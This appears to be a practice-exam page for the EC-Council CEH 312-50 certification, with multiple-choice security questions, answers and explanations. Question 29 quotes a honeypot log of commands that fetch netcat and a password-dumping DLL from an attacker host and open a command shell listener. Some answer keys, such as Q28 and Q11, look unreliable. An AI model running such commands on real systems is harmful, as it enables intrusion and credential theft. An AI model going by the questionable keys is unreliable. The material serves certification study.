312-50 Exam Questions - Online Test


Want to know Examcollection 312-50 Exam practice test features? Want to learn more about the EC-Council Ethical Hacking and Countermeasures (CEHv6) certification experience? Study 100% Guarantee EC-Council 312-50 answers to up-to-the-minute 312-50 questions at Examcollection. Get success with an absolute guarantee to pass the EC-Council 312-50 (Ethical Hacking and Countermeasures (CEHv6)) test on your first attempt.

NEW QUESTION 1

What is the disadvantage of an automated vulnerability assessment tool?

  • A. Ineffective
  • B. Slow
  • C. Prone to false positives
  • D. Prone to false negatives
  • E. Noisy

Answer: E

Explanation:
Vulnerability assessment tools perform a good analysis of system vulnerabilities; however, they are noisy and will quickly trip IDS systems.

NEW QUESTION 2

Maintaining a secure Web server requires constant effort, resources, and vigilance from an organization. Securely administering a Web server on a daily basis is an essential aspect of Web server security.
Maintaining the security of a Web server will usually involve the following steps:
1. Configuring, protecting, and analyzing log files
2. Backing up critical information frequently
3. Maintaining a protected authoritative copy of the organization's Web content
4. Establishing and following procedures for recovering from compromise
5. Testing and applying patches in a timely manner
6. Testing security periodically.
In which step would you engage a forensic investigator?

  • A. 1
  • B. 2
  • C. 3
  • D. 4
  • E. 5
  • F. 6

Answer: D

NEW QUESTION 3

Which of the following is NOT a reason 802.11 WEP encryption is vulnerable?

  • A. There is no mutual authentication between wireless clients and access points
  • B. Automated tools like AirSnort are available to discover WEP keys
  • C. The standard does not provide for centralized key management
  • D. The 24 bit Initialization Vector (IV) field is too small

Answer: C

Explanation:
The lack of centralized key management in itself is not a reason that WEP encryption is vulnerable; it is the people setting the user shared key who make it insecure.

NEW QUESTION 4

Which of the following is one of the key features found in a worm but not seen in a virus?

  • A. The payload is very small, usually below 800 bytes.
  • B. It is self replicating without need for user intervention.
  • C. It does not have the ability to propagate on its own.
  • D. All of them cannot be detected by virus scanners.

Answer: B

Explanation:
A worm is similar to a virus by its design, and is considered to be a sub-class of a virus. Worms spread from computer to computer, but unlike a virus, a worm has the capability to travel without any help from a person. A worm takes advantage of file or information transport features on your system, which allows it to travel unaided.

NEW QUESTION 5

The following is an email header. What address is that of the true originator of the message?
Return-Path: <bgates@microsoft.com>
Received: from smtp.com (fw.emumail.com [215.52.220.122])
by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807 for <mikeg@thesolutionfirm.com>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10]) by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123) by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <bgates@microsoft.com>
To: "mikeg" <mikeg@thesolutionfirm.com>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal

  • A. 19.25.19.10
  • B. 51.32.123.21
  • C. 168.150.84.123
  • D. 215.52.220.122
  • E. 8.10.2/8.10.2

Answer: C

Explanation:
Spoofing can be easily achieved by manipulating the "from" name field, however, it is much more difficult to hide the true source address. The "received from" IP address 168.150.84.123 is the true source of the

NEW QUESTION 6

Samuel is the network administrator of DataX communications Inc. He is trying to configure his firewall to block password brute-force attempts on his network. He enables blocking the intruder’s IP address for a period of 24 hours after more than three unsuccessful attempts. He is confident that this rule will secure his network against hackers on the Internet.
But he still receives hundreds of thousands of brute-force attempts generated from various IP addresses around the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the Internet which has been scripted to enable the random usage of various proxies on each request so as not to get caught by the firewall rule.
Later he adds another rule to his firewall and enables a small sleep on the password attempt so that if the password is incorrect, it would take 45 seconds to return to the user to begin another attempt. Since an intruder may use multiple machines to brute force the password, he also throttles the number of connections that the server will be prepared to accept from a particular IP address. This action will slow the intruder’s attempts.
Samuel wants to completely block hackers' brute-force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?

  • A. Enforce a password policy and use account lockouts after three wrong logon attempts even though this might lock out legit users
  • B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder so that you can block them at the firewall manually
  • C. Enforce complex password policy on your network so that passwords are more difficult to brute force
  • D. You can’t completely block the intruders' attempts if they constantly switch proxies

Answer: D

Explanation:
Without knowing where the next attack will come from, there is no way to proactively block the attack. This is becoming an increasing problem with the growth of large botnets using ordinary workstations and home computers in large numbers.

NEW QUESTION 7

What type of port scan is shown below?
[Exhibit not included]

  • A. Idle Scan
  • B. Windows Scan
  • C. XMAS Scan
  • D. SYN Stealth Scan

Answer: C

Explanation:
An Xmas port scan is a variant of the TCP port scan. This type of scan tries to obtain information about the state of a target port by sending a packet which has multiple TCP flags set to 1 - "lit as an Xmas tree". The flags set for an Xmas scan are FIN, URG and PSH. The purpose is to confuse and bypass simple firewalls. Some stateless firewalls only check against security policy those packets which have the SYN flag set (that is, packets that initiate a connection according to the standards). Since Xmas scan packets are different, they can pass through these simple systems and reach the target host.

NEW QUESTION 8

On wireless networks, an SSID is used to identify the network. Why are SSIDs not considered to be a good security mechanism to protect a wireless network?

  • A. The SSID is only 32 bits in length
  • B. The SSID is transmitted in clear text
  • C. The SSID is to identify a station not a network
  • D. The SSID is the same as the MAC address for all vendors

Answer: B

Explanation:
The use of SSIDs is a fairly weak form of security, because most access points broadcast the SSID, in clear text, multiple times per second within the body of each beacon frame. A hacker can easily use an 802.11 analysis tool (e.g., AirMagnet, Netstumbler, or AiroPeek) to identify the SSID.

NEW QUESTION 9

Exhibit: [not included]
You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply?

  • A. ip = 10.0.0.22
  • B. ip.src == 10.0.0.22
  • C. ip.equals 10.0.0.22
  • D. ip.address = 10.0.0.22

Answer: B

Explanation:
ip.src tells the filter to only show packets with 10.0.0.22 as the source.

NEW QUESTION 10

What is a primary advantage a hacker gains by using encryption or programs such as Loki?

  • A. It allows an easy way to gain administrator rights
  • B. It is effective against Windows computers
  • C. It slows down the effective response of an IDS
  • D. IDS systems are unable to decrypt it
  • E. Traffic will not be modified in transit

Answer: D

Explanation:
Because the traffic is encrypted, an IDS cannot understand it or evaluate the payload.

NEW QUESTION 11

Bob is a Junior Administrator at ABC Company. He is installing RedHat Enterprise Linux on his machine. At installation time, he removed the “Use MD5” options. What will be the hashing standard?

  • A. MD2
  • B. DES
  • C. 3DES
  • D. RSA

Answer: B

Explanation:
crypt() will return an encrypted string using the standard Unix DES-based encryption algorithm or alternative algorithms that may be available on the system. By removing the “Use MD5” option Bob forces crypt() to revert to DES encryption.

NEW QUESTION 12

Which of the following is most effective against passwords? Select the answer.

  • A. Dictionary Attack
  • B. BruteForce attack
  • C. Targeted Attack
  • D. Manual password Attack

Answer: B

Explanation:
The most effective means of password attack is brute force. In a brute force attack the program will attempt to use every possible combination of characters. While this takes longer than a dictionary attack, which uses a text file of real words, it is always capable of breaking the password.

NEW QUESTION 13

Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position.
Harold is currently trying to run a sniffer on the agency’s network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pores through the sniffer’s manual but can’t find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on the problem. Harold is told that the sniffer was not working because the agency’s network is a switched network, which can’t be sniffed by some programs without some tweaking.
What technique could Harold use to sniff the agency’s switched network?

  • A. ARP spoof the default gateway
  • B. Conduct MiTM against the switch
  • C. Launch smurf attack against the switch
  • D. Flood switch with ICMP packets

Answer: A

Explanation:
ARP spoofing, also known as ARP poisoning, is a technique used to attack an Ethernet network which may allow an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether (known as a denial of service attack). The principle of ARP spoofing is to send fake, or 'spoofed', ARP messages to an Ethernet LAN. These frames contain false MAC addresses, confusing network devices, such as network switches. As a result frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or an unreachable host (a denial of service attack).

NEW QUESTION 14

In order to attack a wireless network, you put up an access point and override the signal of the real access point. When users send authentication data, you are able to capture it. What kind of attack is this?

  • A. WEP Attack
  • B. Drive by hacking
  • C. Rogue Access Point Attack
  • D. Unauthorized Access Point Attack

Answer: C

Explanation:
A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from local network management or has been created to allow a cracker to conduct a man-in-the-middle attack.

NEW QUESTION 15

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this?

  • A. Block TCP at the firewall
  • B. Block UDP at the firewall
  • C. Block ICMP at the firewall
  • D. There is no way to completely block tracerouting into this area

Answer: D

Explanation:
If you create rules that prevent attackers from performing traceroutes to your DMZ, then you’ll also prevent anyone from accessing the DMZ from outside the company network, and in that case it is not a DMZ you have.

NEW QUESTION 16

Which of the following best describes session key creation in SSL?

  • A. It is created by the server after verifying the user's identity
  • B. It is created by the server upon connection by the client
  • C. It is created by the client from the server's public key
  • D. It is created by the client after verifying the server's identity

Answer: D

Explanation:
An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.

NEW QUESTION 17

You are sniffing an unprotected WiFi network located in a JonDonalds Cybercafe with Ethereal to capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while sipping brewed coffee from JonDonalds. You want to sniff their email messages traversing the unprotected WiFi network.
Which of the following Ethereal filters will you configure to display only the packets with the hotmail messages?

  • A. (http contains “hotmail”) && ( http contains “Reply-To”)
  • B. (http contains “e-mail” ) && (http contains “hotmail”)
  • C. (http = “login.passport.com” ) && (http contains “SMTP”)
  • D. (http = “login.passport.com” ) && (http contains “POP3”)

Answer: A

Explanation:
Each Hotmail message contains the tag Reply-To:<sender address> and “xxxx-xxx-xxx.xxxx.hotmail.com” in the received tag.

NEW QUESTION 18

Which type of attack is port scanning?

  • A. Web server attack
  • B. Information gathering
  • C. Unauthorized access
  • D. Denial of service attack

Answer: B

NEW QUESTION 19

What is "Hacktivism"?

  • A. Hacking for a cause
  • B. Hacking ruthlessly
  • C. An association which groups activists
  • D. None of the above

Answer: A

Explanation:
The term was coined by author/critic Jason Logan King Sack in an article about media artist Shu Lea Cheang. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience.

NEW QUESTION 20

Which of the following is the best way an attacker can passively learn about technologies used in an organization?

  • A. By sending web bugs to key personnel
  • B. By webcrawling the organization web site
  • C. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
  • D. By performing a port scan on the organization's web site

Answer: C

Explanation:
Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks; the question asks for "passive".

NEW QUESTION 21

Peter extracts the SID list from a Windows 2008 Server machine using the hacking tool "SIDExtracter". Here is the output of the SIDs:
[Exhibit not included]
From the above list, identify the user account with System Administrator privileges.

  • A. John
  • B. Rebecca
  • C. Sheela
  • D. Shawn
  • E. Somia
  • F. Chang
  • G. Micah

Answer: F

NEW QUESTION 22

Wayne is the senior security analyst for his company. Wayne is examining some traffic logs on a server and came across some inconsistencies. Wayne finds some IP packets from a computer purporting to be on the internal network. The packets originate from 192.168.12.35 with a TTL of 15. The server replied to this computer and received a response from 192.168.12.35 with a TTL of 21. What can Wayne infer from this traffic log?

  • A. The initial traffic from 192.168.12.35 was being spoofed.
  • B. The traffic from 192.168.12.25 is from a Linux computer.
  • C. The TTL of 21 means that the client computer is on wireless.
  • D. The client computer at 192.168.12.35 is a zombie computer.

Answer: A

NEW QUESTION 23

Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply)

  • A. CHAT rooms
  • B. WHOIS database
  • C. News groups
  • D. Web sites
  • E. Search engines
  • F. Organization’s own web site

Answer: ABCDEF

Explanation:
A security tester should search for information everywhere that he/she can access. You never know where you will find that small piece of information that could penetrate a strong defense.

NEW QUESTION 24

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this?

  • A. WEP attack
  • B. Drive by hacking
  • C. Rogue access point attack
  • D. Unauthorized access point attack

Answer: C

Explanation:
The definition of a Rogue access point is:
1. A wireless access point (AP) installed by an employee without the consent of the IT department. Without the proper security configuration, users have exposed their company's network to the outside world.
2. An access point (AP) set up by an attacker outside a facility with a wireless network. Also called an "evil twin," the rogue AP picks up beacons (signals that advertise its presence) from the company's legitimate AP and transmits identical beacons, which some client machines inside the building associate with.

NEW QUESTION 25

Exhibit: [not included]
Given the following extract from the snort log on a honeypot, what do you infer from the attack?

  • A. A new port was opened
  • B. A new user id was created
  • C. The exploit was successful
  • D. The exploit was not successful

Answer: D

Explanation:
The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.

NEW QUESTION 26

You work as security technician at ABC.com. While doing web application testing, you might be required to look through multiple web pages online which can take a long time. Which of the processes listed below would be a more efficient way of doing this type of validation?

  • A. Use mget to download all pages locally for further inspection.
  • B. Use wget to download all pages locally for further inspection.
  • C. Use get* to download all pages locally for further inspection.
  • D. Use get() to download all pages locally for further inspection.

Answer: B

Explanation:
Wget is a utility used for mirroring websites. get* doesn’t work, as for the actual FTP command to work there needs to be a space between get and * (i.e. get *). get(); is just bogus; that’s a C function that’s written 100% wrong. mget is a command used from “within” ftp itself, ruling out A. Which leaves B: use wget, which is designed for mirroring and downloading files, especially web pages. If used with the -r option (i.e. wget -r www.ABC.com) it could mirror a site, all except protected portions of course.
Note: GNU Wget is a free network utility to retrieve files from the World Wide Web using HTTP and FTP and can be used to make mirrors of archives and home pages thus enabling work in the background, after having logged off.

NEW QUESTION 27

You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word 'facebook'?

  • A. display==facebook
  • B. traffic.content==facebook
  • C. tcp contains facebook
  • D. list.display.facebook

Answer: C

NEW QUESTION 28

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack?

  • A. Timestamps
  • B. SMB Signing
  • C. File permissions
  • D. Sequence numbers monitoring

Answer: ABD

NEW QUESTION 29

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp -s:ftpcom”
“cmd1.exe /c nc -l -p 6969 e-cmd1.exe”
What can you infer from the exploit given?

  • A. It is a local exploit where the attacker logs in using username johna2k.
  • B. There are two attackers on the system – johna2k and haxedj00.
  • C. The attack is a remote exploit and the hacker downloads three files.
  • D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer: C
